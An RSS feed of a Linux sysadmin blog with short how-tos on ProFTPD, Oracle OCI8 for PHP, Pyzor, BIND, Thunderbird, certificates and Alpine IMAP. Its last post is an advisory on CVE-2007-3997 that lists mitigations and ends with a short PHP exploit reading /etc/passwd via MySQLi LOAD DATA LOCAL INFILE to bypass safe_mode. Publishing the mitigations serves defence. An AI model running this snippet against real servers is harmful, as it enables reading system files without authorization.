<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hodžův blog &#187; Služby</title>
	<atom:link href="http://hodza.net/category/linux/sluzby/feed/" rel="self" type="application/rss+xml" />
	<link>http://hodza.net</link>
	<description>I přestože jsem paranoidní neznamená, že mě nedostanou...</description>
	<lastBuildDate>Sat, 05 May 2012 08:18:49 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>HowTo resolve ProFTPD problem: Fatal: unknown configuration directive &#8216;SQLHomedirOnDemand&#8217; on line xxx of &#8216;/etc/proftpd/proftpd.conf&#8217;</title>
		<link>http://hodza.net/2011/09/02/howto-resolve-problem-fatal-unknown-configuration-directive-sqlhomedirondemand-on-line-xxx-of-etcproftpdproftpd-conf/</link>
		<comments>http://hodza.net/2011/09/02/howto-resolve-problem-fatal-unknown-configuration-directive-sqlhomedirondemand-on-line-xxx-of-etcproftpdproftpd-conf/#comments</comments>
		<pubDate>Fri, 02 Sep 2011 11:21:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Debian]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=2125</guid>
		<description><![CDATA[This directive has been deprecated with ProFTPD 1.3.1rc1. Please use CreateHome instead. http://www.proftpd.org/docs/howto/CreateHome.html]]></description>
			<content:encoded><![CDATA[<p>This directive has been deprecated with ProFTPD 1.3.1rc1. Please use CreateHome instead.</p>
<p><a title="ProFTPD's CreateHome" href="http://www.proftpd.org/docs/howto/CreateHome.html" target="_blank">http://www.proftpd.org/docs/howto/CreateHome.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2011/09/02/howto-resolve-problem-fatal-unknown-configuration-directive-sqlhomedirondemand-on-line-xxx-of-etcproftpdproftpd-conf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HowTo install Oracle Instant Client and PHP OCI8 module under Debian Squueze (Ubuntu) 64bit</title>
		<link>http://hodza.net/2011/08/01/howto-install-oracle-instant-client-and-php-oci8-module-under-debian-squueze-ubuntu-64bit/</link>
		<comments>http://hodza.net/2011/08/01/howto-install-oracle-instant-client-and-php-oci8-module-under-debian-squueze-ubuntu-64bit/#comments</comments>
		<pubDate>Mon, 01 Aug 2011 12:22:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apache]]></category>
		<category><![CDATA[Debian]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[Scriptíky]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=2099</guid>
		<description><![CDATA[1) Download the Basic and the SDK packages from http://www.oracle.com (registration needed). # mkdir -p /opt/oracle/instantclient # cd /opt/oracle/instantclient # wget http://download.oracle.com/otn/linux/instantclient/112020/instantclient-basic-linux-x86-64-11.2.0.2.0.zip # wget http://download.oracle.com/otn/linux/instantclient/112020/instantclient-sdk-linux-x86-64-11.2.0.2.0.zip" 2) Unzip files, move it in correct location and delete unnecessary archives unzip instantclient-basic-linux-x86-64-11.2.0.2.0.zip unzip instantclient-sdk-linux-x86-64-11.2.0.2.0.zip mv instantclient_11_2/* ./ rm -r instantclient_11_2/ instantclient-basic-linux-x86-64-11.2.0.2.0.zip instantclient-sdk-linux-x86-64-11.2.0.2.0.zip 3) Craate missing simlinks ln -s [...]]]></description>
			<content:encoded><![CDATA[<p>1) Download the Basic and the SDK packages from http://www.oracle.com (registration needed).<br />
<code># mkdir -p /opt/oracle/instantclient<br />
# cd /opt/oracle/instantclient<br />
# wget http://download.oracle.com/otn/linux/instantclient/112020/instantclient-basic-linux-x86-64-11.2.0.2.0.zip<br />
# wget http://download.oracle.com/otn/linux/instantclient/112020/instantclient-sdk-linux-x86-64-11.2.0.2.0.zip"<br />
</code><br />
<span id="more-2099"></span><br />
2) Unzip files, move it in correct location and delete unnecessary archives<br />
<code>unzip instantclient-basic-linux-x86-64-11.2.0.2.0.zip<br />
unzip instantclient-sdk-linux-x86-64-11.2.0.2.0.zip<br />
mv instantclient_11_2/* ./<br />
rm -r instantclient_11_2/ instantclient-basic-linux-x86-64-11.2.0.2.0.zip instantclient-sdk-linux-x86-64-11.2.0.2.0.zip<br />
</code></p>
<p>3) Craate missing simlinks<br />
<code>ln -s libclntsh.so.10.1 libclntsh.so<br />
ln -s libocci.so.10.1 libocci.so</code></p>
<p>4) Install packages<br />
<code># aptitude install build-essential php5-dev php-pear libaio1 </code><br />
<code># pecl install oci8 (on question reply: instantclient,/opt/oracle/instantclient)</code></p>
<p>5) Enable the oci8 module in the php.ini<br />
<code># vi /etc/php5/apache2/php.ini<br />
extension=oci8.so (put this line after the examples starting with ;Dynamic Extension).</code><br />
<code># vi /etc/php5E/cli/php.ini<br />
extension=oci8.so (put this line after the examples starting with ;Dynamic Extension).</code></p>
<p>6) Restart Apache Web server<br />
<code>/etc/init.d/apache2 restart</code></p>
<p>Now stop and start Apache. You should see the oci8 module in the output of phpinfo().</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2011/08/01/howto-install-oracle-instant-client-and-php-oci8-module-under-debian-squueze-ubuntu-64bit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HowTo fix a problem &#8222;DeprecationWarning: the sha module is deprecated; use the hashlib module instead import sha&#8220; in Pyzor</title>
		<link>http://hodza.net/2011/07/30/howto-fix-a-problem-deprecationwarning-the-sha-module-is-deprecated-use-the-hashlib-module-instead-import-sha-in-pyzor/</link>
		<comments>http://hodza.net/2011/07/30/howto-fix-a-problem-deprecationwarning-the-sha-module-is-deprecated-use-the-hashlib-module-instead-import-sha-in-pyzor/#comments</comments>
		<pubDate>Sat, 30 Jul 2011 18:02:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Scriptíky]]></category>
		<category><![CDATA[Smtp]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=2096</guid>
		<description><![CDATA[After a fresh Pyzor install I&#8217;m getting this error message: # aptitude install pyzor # pyzor discover /usr/lib/pymodules/python2.6/pyzor/__init__.py:11: DeprecationWarning: the sha module is deprecated; use the hashlib module instead import sha /usr/lib/pymodules/python2.6/pyzor/client.py:12: DeprecationWarning: the multifile module has been deprecated since Python 2.5 import multifile downloading servers from http://pyzor.sourceforge.net/cgi-bin/inform-servers-0-3-x A simple fix for this problem exists. Open [...]]]></description>
			<content:encoded><![CDATA[<p>After a fresh Pyzor install I&#8217;m getting this error message:<br />
<code># aptitude install pyzor<br />
# pyzor discover<br />
/usr/lib/pymodules/python2.6/pyzor/__init__.py:11: DeprecationWarning: the sha module is deprecated; use the hashlib module instead<br />
  import sha<br />
/usr/lib/pymodules/python2.6/pyzor/client.py:12: DeprecationWarning: the multifile module has been deprecated since Python 2.5<br />
  import multifile<br />
downloading servers from http://pyzor.sourceforge.net/cgi-bin/inform-servers-0-3-x<br />
</code><br />
<span id="more-2096"></span><br />
A simple fix for this problem exists. Open file /usr/bin/pyzor.<br />
<code># vi /usr/bin/pyzor</code></p>
<p>Delete line<br />
<code>#!/usr/bin/python</code></p>
<p>And insert this new one<br />
<code>#!/usr/bin/python -Wignore::DeprecationWarning</code><br />
Test it<br />
<code># pyzor discover<br />
downloading servers from http://pyzor.sourceforge.net/cgi-bin/inform-servers-0-3-x</code></p>
<p>That&#8217;s all folks!</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2011/07/30/howto-fix-a-problem-deprecationwarning-the-sha-module-is-deprecated-use-the-hashlib-module-instead-import-sha-in-pyzor/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HowTo fix a problem &#8222;loading from master file managed-keys.bind failed: file not found&#8220; under Debain Squeeze</title>
		<link>http://hodza.net/2011/07/30/howto-fix-a-problem-loading-from-master-file-managed-keys-bind-failed-file-not-found-under-debain-squeeze/</link>
		<comments>http://hodza.net/2011/07/30/howto-fix-a-problem-loading-from-master-file-managed-keys-bind-failed-file-not-found-under-debain-squeeze/#comments</comments>
		<pubDate>Sat, 30 Jul 2011 16:30:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Debian]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Scriptíky]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=2091</guid>
		<description><![CDATA[# touch /var/cache/bind/managed-keys.bind # chown root:bind /var/cache/bind/managed-keys.bind # /etc/init.d/bind9 restart # tail -n 50 /var/log/daemon.log]]></description>
			<content:encoded><![CDATA[<p><code># touch /var/cache/bind/managed-keys.bind<br />
# chown root:bind /var/cache/bind/managed-keys.bind<br />
# /etc/init.d/bind9 restart<br />
# tail -n 50 /var/log/daemon.log<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2011/07/30/howto-fix-a-problem-loading-from-master-file-managed-keys-bind-failed-file-not-found-under-debain-squeeze/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HowTo install Mozilla Thunderbird 5 Final from PPA (Ubuntu 10.04/10.10/11.04)</title>
		<link>http://hodza.net/2011/07/14/howto-install-mozilla-thunderbird-5-final-from-ppa-ubuntu-10-0410-1011-04/</link>
		<comments>http://hodza.net/2011/07/14/howto-install-mozilla-thunderbird-5-final-from-ppa-ubuntu-10-0410-1011-04/#comments</comments>
		<pubDate>Thu, 14 Jul 2011 16:17:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Smtp]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=2076</guid>
		<description><![CDATA[# sudo apt-add-repository ppa:mozillateam/thunderbird-stable # sudo apt-get update # sudo apt-get install thunderbird Release Notes: http://www.mozilla.org/en-US/thunderbird/5.0/releasenotes/]]></description>
			<content:encoded><![CDATA[<p><code># sudo apt-add-repository ppa:mozillateam/thunderbird-stable<br />
# sudo apt-get update<br />
# sudo apt-get install thunderbird</code></p>
<p>Release Notes: <a href="http://www.mozilla.org/en-US/thunderbird/5.0/releasenotes/" target="_blank">http://www.mozilla.org/en-US/thunderbird/5.0/releasenotes/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2011/07/14/howto-install-mozilla-thunderbird-5-final-from-ppa-ubuntu-10-0410-1011-04/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Generování Self-Signed Certifikátu skriptem</title>
		<link>http://hodza.net/2009/06/09/generovani-self-signed-certifikatu-skriptem/</link>
		<comments>http://hodza.net/2009/06/09/generovani-self-signed-certifikatu-skriptem/#comments</comments>
		<pubDate>Tue, 09 Jun 2009 07:23:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apache]]></category>
		<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Scriptíky]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=245</guid>
		<description><![CDATA[Už mě to nebaví pořád psát, takže: #!/bin/bash SERVER_NAME=$1 OPENSSL_PATH=/usr/bin/openssl $OPENSSL_PATH genrsa -des3 -out $SERVER_NAME.key 1024 $OPENSSL_PATH genrsa -out $SERVER_NAME.key 1024 $OPENSSL_PATH rsa -in $SERVER_NAME.key -out $SERVER_NAME.pem $OPENSSL_PATH req -new -key $SERVER_NAME.pem -out $SERVER_NAME.csr $OPENSSL_PATH x509 -req -days 365 -in $SERVER_NAME.csr -signkey $SERVER_NAME.pem -out $SERVER_NAME.crt]]></description>
			<content:encoded><![CDATA[<p>Už mě to nebaví pořád psát, takže:</p>
<p><code>#!/bin/bash<br />
SERVER_NAME=$1<br />
OPENSSL_PATH=/usr/bin/openssl<br />
$OPENSSL_PATH genrsa -des3 -out $SERVER_NAME.key 1024<br />
$OPENSSL_PATH genrsa -out $SERVER_NAME.key 1024<br />
$OPENSSL_PATH rsa -in $SERVER_NAME.key -out $SERVER_NAME.pem<br />
$OPENSSL_PATH req -new -key $SERVER_NAME.pem -out $SERVER_NAME.csr<br />
$OPENSSL_PATH x509 -req -days 365 -in $SERVER_NAME.csr -signkey $SERVER_NAME.pem -out $SERVER_NAME.crt<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2009/06/09/generovani-self-signed-certifikatu-skriptem/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Jak znovu poslat zprávy z MailDiru?</title>
		<link>http://hodza.net/2009/06/03/jak-znovu-poslat-zpravy-z-maildiru/</link>
		<comments>http://hodza.net/2009/06/03/jak-znovu-poslat-zpravy-z-maildiru/#comments</comments>
		<pubDate>Wed, 03 Jun 2009 09:24:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Smtp]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=239</guid>
		<description><![CDATA[Dnes mě zákazník poprosil o přeposlání všech emailů na druhou doménu. Standardně bych to řešil pomocí scriptu ImapSync, ale protože jsem neznal heslo na cílovém serveru vymyslel jsem řešení jednodušší a lepší. Stačí se přihlásit na server, kde jsou uložené zprávy ve formátu MailDir a pak spustit příkaz: for f in `ls`; do sendmail example@example.com [...]]]></description>
			<content:encoded><![CDATA[<p>Dnes mě zákazník poprosil o přeposlání všech emailů na druhou doménu. Standardně bych to řešil pomocí scriptu <a href="http://freshmeat.net/projects/imapsync/">ImapSync</a>, ale protože jsem neznal heslo na cílovém serveru vymyslel jsem řešení jednodušší a lepší.</p>
<p>Stačí se přihlásit na server, kde jsou uložené zprávy ve formátu MailDir a pak spustit příkaz:<br />
<code>for f in `ls`; do sendmail example@example.com &lt;$f; done</code><br />
Veškeré emaily v aktuální složce se tím přeposšlou na adresu example@example.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2009/06/03/jak-znovu-poslat-zpravy-z-maildiru/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VMware Server console &amp; Ubuntu Hardy Herron</title>
		<link>http://hodza.net/2008/11/03/vmware-server-console-ubuntu-hardy-herron/</link>
		<comments>http://hodza.net/2008/11/03/vmware-server-console-ubuntu-hardy-herron/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 07:28:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[virtualizace]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=221</guid>
		<description><![CDATA[Po nainstalovaání VMware Server console v Hardym mě vždy trápí chybové hlášení: # vmware-server-console /usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_3.4' not found (required by /usr/lib/libcairo.so.2) /usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_4.2.0' not found (required by /usr/lib/libstdc++.so.6) Pomoc je přitom velice jednoduchá: # sudo ln -sf /usr/lib/libpng12.so.0 /usr/lib/vmware-server-console/lib/libpng12.so.0/libpng12.so.0 # sudo ln -sf /lib/libgcc_s.so.1 /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1]]></description>
			<content:encoded><![CDATA[<p>Po nainstalovaání VMware Server console v Hardym mě vždy trápí chybové hlášení:</p>
<p><code># vmware-server-console<br />
/usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_3.4' not found (required by /usr/lib/libcairo.so.2)<br />
/usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_4.2.0' not found (required by /usr/lib/libstdc++.so.6)</code></p>
<p>Pomoc je přitom velice jednoduchá:<br />
<code><br />
# sudo ln -sf /usr/lib/libpng12.so.0 /usr/lib/vmware-server-console/lib/libpng12.so.0/libpng12.so.0<br />
# sudo ln -sf /lib/libgcc_s.so.1 /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/11/03/vmware-server-console-ubuntu-hardy-herron/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Alpine a IMAP</title>
		<link>http://hodza.net/2008/08/04/alpine-a-imap/</link>
		<comments>http://hodza.net/2008/08/04/alpine-a-imap/#comments</comments>
		<pubDate>Mon, 04 Aug 2008 09:02:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Služby]]></category>
		<category><![CDATA[Smtp]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=141</guid>
		<description><![CDATA[Již dlouhou dobu si pohrávám s myšlenkou, že se od Mozilly Thunderbird vrátím zpět k emailovému klientovi (al)pine. Důvodem je především rychlost. Ta mi u Thunderbirdu subjektivně přijde stále horší a to i přes fakt, že k práci používám zásadně protokol IMAP. Po koupi nového subnotebooku MSI WIND mě navíc začala štvát &#8222;roztahanost&#8220; celého GUI. [...]]]></description>
			<content:encoded><![CDATA[<p>Již dlouhou dobu si pohrávám s myšlenkou, že se od <a title="Mozilla Thunderbird" href="http://www.czilla.cz/produkty/thunderbird/">Mozilly Thunderbird</a> vrátím zpět k emailovému klientovi (<a title="Alpine" href="http://www.washington.edu/alpine/">al</a>)<a title="Pine" href="http://www.washington.edu/pine/">pine</a>. Důvodem je především rychlost. Ta mi u Thunderbirdu subjektivně přijde stále horší a to i přes fakt, že k práci používám zásadně protokol IMAP. Po koupi nového subnotebooku MSI WIND mě navíc začala štvát &#8222;roztahanost&#8220; celého GUI. Při použití i těch nejmenších písmen a ikon bez popisku si mohu přečíst sotva prvních pár řádků z celého emailu (a to jsem navíc ošizen o podstatnou část hlaviček). Kapitolou sama pro sebe je náročnost na paměť a výkon procesoru.</p>
<p><span id="more-141"></span></p>
<p>Pine jsem používal před několika lety společně s <a title="Fetchmail" href="http://fetchmail.berlios.de/">fetchmailem</a>. To už by byl dnes problém, neboť potřebuji mít k poště mobilní přístup odkudkoliv (můj mail box čítá více jak 10 000 emailů) a tak jsem začal pátrat, zda-li existuje možnost používat nativně <a title="IMAP" href="http://cs.wikipedia.org/wiki/Internet_Message_Access_Protocol">IMAP</a>. Naštěstí existuje!</p>
<p>První co bylo potřeba udělat je vyměnit starý a dnes již nevyvíjený <a title="Pine" href="http://www.washington.edu/pine/">Pine</a> za <a title="Alpine" href="http://www.washington.edu/alpine/">Alpine</a>. Jako betatester mi posloužil<a title="Blog Ivana Bíbra" href="http://www.bibri.net/"> Ivan Bíbr</a> &#8211; <a title="urpme pine" href="http://www.bibri.net/2008/06/29/urpme-pine/">více na jeho blogu</a>. Ovládání i konfigurační soubory jsou naštěstí stejné, takže mi nečinilo problém Alpine naohýbat k obrazu svému. Dále jsem pokračoval úpravou konfiguračního souboru .pinerc v domovském adresáři.</p>
<p><code>$ vi ~/.pinerc</code></p>
<p>V souboru .pinerc jsem upravil konfigurační volby &#8222;<strong>smtp-server</strong>&#8222;, &#8222;<strong>inbox-path</strong>&#8220; a &#8222;<strong>feature-list</strong>&#8220; na následující:</p>
<p><em>Pozn.: Jednotlivé volby je samozřejmě možné &#8222;naklikat&#8220; přes menu Alpine, ale takhle mi to přijde jednodušší.</em></p>
<p><code>smtp-server=smtp.example.com<br />
inbox-path={mail.example.com/user=test@test.com/ssl/novalidate-cert}INBOX<br />
feature-list=enable-incoming-folders</code></p>
<p>Ve výše uvedeném příkladu jsem předpokládal, že:<br />
SMTP server je: smtp.example.com<br />
IMAP server je: mail.example.com<br />
Přihlašovací jméno je: test@test.com<br />
K serveru se připojujeme pomocí SSL via self-signed certifikát</p>
<p>Protože Alpine defaultně pracuje s lokálně uloženými složkami, bylo potřeba ho ještě naučit pracovat přímo s IMAPem. postup je velice jednoduchý:</p>
<p><code>$ alpine<br />
Zmáčkneme S (Setup)<br />
Zmáčkneme L (collectionLists)<br />
Zmáčkneme A (Add Client)</code></p>
<p>Vyplníme:<br />
<code>Nickname : IMAP složky<br />
Server : mail.example.com/user=test@test.com/ssl/novalidate-cert<br />
Path : INBOX.<br />
View :</code></p>
<p>Nakonec zmáčkneme klávesu CTRl+x pro uložení změn</p>
<p>Tak a je hotovo &#8211; můžu používat IMAP!</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/08/04/alpine-a-imap/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP</title>
		<link>http://hodza.net/2007/10/15/php/</link>
		<comments>http://hodza.net/2007/10/15/php/#comments</comments>
		<pubDate>Mon, 15 Oct 2007 11:10:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Hack/Crack]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=23</guid>
		<description><![CDATA[První díl, ze &#8222;seriálu o bezpečnosti&#8220;, aneb tuníme náš server&#8230; Vztahuje se k: &#60; = PHP 5.2.3 &#60;= PHP 4.4.7 CVE: CVE-2007-3997 Problém: Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode. Detail: Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému. Řešení: 1) Kompilovat MySQL klienta s parametrem &#8222;&#8211;disable-local-infile&#8220; [...]]]></description>
			<content:encoded><![CDATA[<p>První díl, ze &#8222;seriálu o bezpečnosti&#8220;, aneb tuníme náš server&#8230;</p>
<p><span id="more-23"></span></p>
<p><strong>Vztahuje se k:</strong><br />
&lt; = PHP 5.2.3<br />
&lt;= PHP 4.4.7</p>
<p><strong>CVE:</strong><br />
CVE-2007-3997</p>
<p><strong>Problém:</strong><br />
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.</p>
<p><strong>Detail:</strong><br />
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.</p>
<p><strong>Řešení:</strong><br />
1) Kompilovat MySQL klienta s parametrem &#8222;&#8211;disable-local-infile&#8220;<br />
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem &#8222;mysqli-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);&#8220;<br />
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) &#8222;set-variable=local-infile=0&#8243;.</p>
<p><strong>Exploit:</strong><br />
function r($fp, &amp;$buf, $len, &amp;$err) {print fread($fp, $len);}<br />
$m = new mysqli(&#8216;localhost&#8217;, &#8216;aaaa&#8217;, &#8220;, &#8216;a&#8217;);<br />
$m-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);<br />
$m-&gt;set_local_infile_handler(&#8222;r&#8220;);<br />
$m-&gt;query(&#8222;LOAD DATA LOCAL INFILE &#8216;/etc/passwd&#8217; INTO TABLE a.a&#8220;);<br />
$m-&gt;close();</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2007/10/15/php/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

